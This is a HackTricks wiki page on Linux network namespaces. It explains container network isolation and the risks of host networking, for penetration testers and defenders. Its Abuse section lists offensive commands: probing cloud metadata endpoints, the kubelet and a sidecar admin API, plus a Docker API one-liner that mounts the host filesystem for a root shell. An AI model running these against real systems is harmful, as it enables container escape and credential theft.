network-namespace.md (12431B)
1 --- 2 title: "Network Namespace" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/namespaces/network-namespace.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/namespaces/network-namespace.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Network Namespace 14 15 ## Overview 16 17 The network namespace isolates network-related resources such as interfaces, IP addresses, routing tables, ARP/neighbor state, firewall rules, sockets, the UNIX-domain abstract socket namespace, and the contents of files like `/proc/net`.<sup>[[2]](#references)</sup> This is why a container can have what looks like its own `eth0`, its own local routes, and its own loopback device without owning the host's real network stack. 18 19 Security-wise, this matters because network isolation is about much more than port binding. A private network namespace limits what the workload can directly observe or reconfigure. Once that namespace is shared with the host, the container may suddenly gain visibility into host listeners, host-local services, abstract AF_UNIX endpoints, and network control points that were never meant to be exposed to the application. 20 21 ## Operation 22 23 A freshly created network namespace begins with an empty or almost empty network environment until interfaces are attached to it. Container runtimes then create or connect virtual interfaces, assign addresses, and configure routes so the workload has the expected connectivity. In bridge-based deployments, this usually means the container sees a veth-backed interface connected to a host bridge. In Kubernetes, CNI plugins handle the equivalent setup for Pod networking. 24 25 This architecture explains why `--network=host` or `hostNetwork: true` is such a dramatic change. Instead of receiving a prepared private network stack, the workload joins the host's actual one. 26 27 ## Lab 28 29 You can see a nearly empty network namespace with: 30 31 ```bash 32 sudo unshare --net --fork bash 33 ip addr 34 ip route 35 ``` 36 37 And you can compare normal and host-networked containers with: 38 39 ```bash 40 docker run --rm debian:stable-slim sh -c 'ip addr || ifconfig' 41 docker run --rm --network=host debian:stable-slim sh -c 'ss -lntp | head' 42 ``` 43 44 The host-networked container no longer has its own isolated socket and interface view. That change alone is already significant before you even ask what capabilities the process has. 45 46 ## Runtime Usage 47 48 Docker and Podman normally create a private network namespace for each container unless configured otherwise. Kubernetes usually gives each Pod its own network namespace, shared by the containers inside that Pod but separate from the host. That means `127.0.0.1` is usually Pod-local rather than container-local: a listener bound only to localhost in one container is typically reachable from its sidecars and siblings. Incus/LXC systems also provide rich network-namespace based isolation, often with a wider variety of virtual networking setups. 49 50 The common principle is that private networking is the default isolation boundary, while host networking is an explicit opt-out from that boundary. 51 52 ## Misconfigurations 53 54 The most important misconfiguration is simply sharing the host network namespace. This is sometimes done for performance, low-level monitoring, or convenience, but it removes one of the cleanest boundaries available to containers. Host-local listeners become reachable in a more direct way, localhost-only services may become accessible, and capabilities such as `CAP_NET_ADMIN` or `CAP_NET_RAW` become much more dangerous because the operations they enable are now applied to the host's own network environment. 55 56 Another problem is overgranting network-related capabilities even when the network namespace is private. A private namespace does help, but it does not make raw sockets or advanced network control harmless. 57 58 In Kubernetes, `hostNetwork: true` also changes how much faith you can place in Pod-level network segmentation. Kubernetes documents that many network plugins cannot properly distinguish `hostNetwork` Pod traffic for `podSelector` / `namespaceSelector` matching and therefore treat it as ordinary node traffic.<sup>[[1]](#references)</sup> From an attacker's point of view, that means a compromised `hostNetwork` workload should often be treated as a node-level network foothold rather than as a normal Pod still constrained by the same policy assumptions as overlay-network workloads. 59 60 ## Abuse 61 62 In weakly isolated setups, attackers may inspect host listening services, reach management endpoints bound only to loopback, sniff or interfere with traffic depending on the exact capabilities and environment, or reconfigure routing and firewall state if `CAP_NET_ADMIN` is present. In a cluster, this can also make lateral movement and control-plane reconnaissance easier. 63 64 If you suspect host networking, start by confirming that the visible interfaces and listeners belong to the host rather than to an isolated container network: 65 66 ```bash 67 ip addr 68 ip route 69 ss -lntup | head -n 50 70 ``` 71 72 Loopback-only services are often the first interesting discovery: 73 74 ```bash 75 ss -lntp | grep '127.0.0.1' 76 curl -s http://127.0.0.1:2375/version 2>/dev/null 77 curl -sk https://127.0.0.1:2376/version 2>/dev/null 78 ``` 79 80 Abstract UNIX sockets are another easy-to-miss target because they are network-namespace scoped even though they do not look like TCP/UDP listeners and may not exist as filesystem paths under `/run`. A host-networked container can therefore inherit access to host-only control channels that were never bind-mounted into the container at all: 81 82 ```bash 83 ss -xap 2>/dev/null | head -n 50 84 grep -a '@' /proc/net/unix 2>/dev/null | head -n 50 85 ``` 86 87 A historical example was the `containerd-shim` abstract-socket exposure bug, but the broader lesson is more important than the specific CVE: once a workload joins the host network namespace, abstract AF_UNIX services become part of the attack surface too.<sup>[[3]](#references)</sup> If those sockets appear runtime-related or administrative, pivot to [Runtime API And Daemon Exposure](/hacktricks/linux-hardening/containers-namespaces/container-security/runtime-api-and-daemon-exposure). 88 89 If network capabilities are present, test whether the workload can inspect or alter the visible stack: 90 91 ```bash 92 capsh --print | grep -E 'cap_net_admin|cap_net_raw' 93 iptables -S 2>/dev/null || nft list ruleset 2>/dev/null 94 ip link show 95 ``` 96 97 On modern kernels, host networking plus `CAP_NET_ADMIN` may also expose the packet path beyond simple `iptables` / `nftables` changes. `tc` qdiscs and filters are namespace-scoped too, so in a shared host network namespace they apply to the host interfaces the container can see. If `CAP_BPF` is additionally present, network-related eBPF programs such as TC and XDP loaders become relevant as well:<sup>[[4]](#references)</sup> 98 99 ```bash 100 capsh --print | grep -E 'cap_net_admin|cap_net_raw|cap_bpf' 101 for i in $(ls /sys/class/net 2>/dev/null); do 102 echo "== $i ==" 103 tc qdisc show dev "$i" 2>/dev/null 104 tc filter show dev "$i" ingress 2>/dev/null 105 tc filter show dev "$i" egress 2>/dev/null 106 done 107 bpftool net 2>/dev/null 108 ``` 109 110 This matters because an attacker may be able to mirror, redirect, shape, or drop traffic at the host interface level, not just rewrite firewall rules. In a private network namespace those actions are contained to the container view; in a shared host namespace they become host-impacting. 111 112 In cluster or cloud environments, host networking also justifies quick local recon of metadata and control-plane-adjacent services: 113 114 ```bash 115 for u in \ 116 http://169.254.169.254/latest/meta-data/ \ 117 http://100.100.100.200/latest/meta-data/ \ 118 http://127.0.0.1:10250/pods; do 119 curl -m 2 -s "$u" 2>/dev/null | head 120 done 121 ``` 122 123 In Kubernetes, remember that compromising **any** container in a multi-container Pod also gives access to localhost listeners opened by sibling containers and sidecars because the whole Pod shares one network namespace. This becomes especially relevant with service-mesh, observability, and helper containers whose admin or debug interfaces are intentionally Pod-internal rather than cluster-wide: 124 125 ```bash 126 ss -lntup | grep -E '127.0.0.1|::1' 127 curl -s http://127.0.0.1:15000/server_info 2>/dev/null | head 128 curl -s http://127.0.0.1:15000/config_dump 2>/dev/null | head 129 ``` 130 131 Treat "bound to localhost" as **Pod-private**, not **container-private**. After one container in the Pod is compromised, that assumption is gone. 132 133 ### Full Example: Host Networking + Local Runtime / Kubelet Access 134 135 Host networking does not automatically provide host root, but it often exposes services that are intentionally reachable only from the node itself. If one of those services is weakly protected, host networking becomes a direct privilege-escalation path. 136 137 Docker API on localhost: 138 139 ```bash 140 curl -s http://127.0.0.1:2375/version 2>/dev/null 141 docker -H tcp://127.0.0.1:2375 run --rm -it -v /:/mnt ubuntu chroot /mnt bash 2>/dev/null 142 ``` 143 144 Kubelet on localhost: 145 146 ```bash 147 curl -k https://127.0.0.1:10250/pods 2>/dev/null | head 148 curl -k https://127.0.0.1:10250/runningpods/ 2>/dev/null | head 149 ``` 150 151 Impact: 152 153 - direct host compromise if a local runtime API is exposed without proper protection 154 - cluster reconnaissance or lateral movement if kubelet or local agents are reachable 155 - traffic manipulation or denial of service when combined with `CAP_NET_ADMIN` 156 157 ## Checks 158 159 The goal of these checks is to learn whether the process has a private network stack, what routes and listeners are visible, and whether the network view already looks host-like before you even test capabilities. 160 161 ```bash 162 readlink /proc/self/ns/net # Current network namespace identifier 163 readlink /proc/1/ns/net # Compare with PID 1 in the current container / pod 164 lsns -t net 2>/dev/null # Reachable network namespaces from this view 165 ip netns identify $$ 2>/dev/null 166 ip addr # Visible interfaces and addresses 167 ip route # Routing table 168 ss -lntup # Listening TCP/UDP sockets with process info 169 ss -xap # UNIX sockets, including abstract namespace entries 170 grep -a '@' /proc/net/unix # Quick view of abstract AF_UNIX sockets in this netns 171 ``` 172 173 What is interesting here: 174 175 - If `/proc/self/ns/net` and `/proc/1/ns/net` already look host-like, the container may be sharing the host network namespace or another non-private namespace. 176 - `lsns -t net` and `ip netns identify` are useful when the shell is already inside a named or persistent namespace and you want to correlate it with `/run/netns` objects from the host side. 177 - `ss -lntup` is especially valuable because it reveals loopback-only listeners and local management endpoints. `ss -xap` and `/proc/net/unix` add the abstract-socket view that ordinary filesystem socket hunts miss. 178 - Routes, interface names, firewall context, `tc` state, and eBPF attachments become much more important if `CAP_NET_ADMIN`, `CAP_NET_RAW`, or `CAP_BPF` is present. 179 - In Kubernetes, failed service-name resolution from a `hostNetwork` Pod may simply mean the Pod is not using `dnsPolicy: ClusterFirstWithHostNet`, not that the service is absent. 180 - In multi-container Pods, localhost listeners belong to the whole Pod network namespace, so check sidecars and sibling containers before assuming a loopback-only port is unreachable from the compromised container. 181 182 When reviewing a container, always evaluate the network namespace together with the capability set. Host networking plus strong network capabilities is a very different posture from bridge networking plus a narrow default capability set. 183 184 ## References 185 186 - [1] [Kubernetes NetworkPolicy and `hostNetwork` caveats](https://kubernetes.io/docs/concepts/services-networking/network-policies/) 187 - [2] [Linux `network_namespaces(7)` and abstract UNIX socket isolation](https://man7.org/linux/man-pages/man7/network_namespaces.7.html) 188 - [3] [containerd advisory: abstract Unix domain sockets exposed to host-network containers](https://github.com/containerd/containerd/security/advisories/GHSA-36xw-fx78-c5r4) 189 - [4] [eBPF token and capability requirements for network-related eBPF programs](https://docs.ebpf.io/linux/concepts/token/)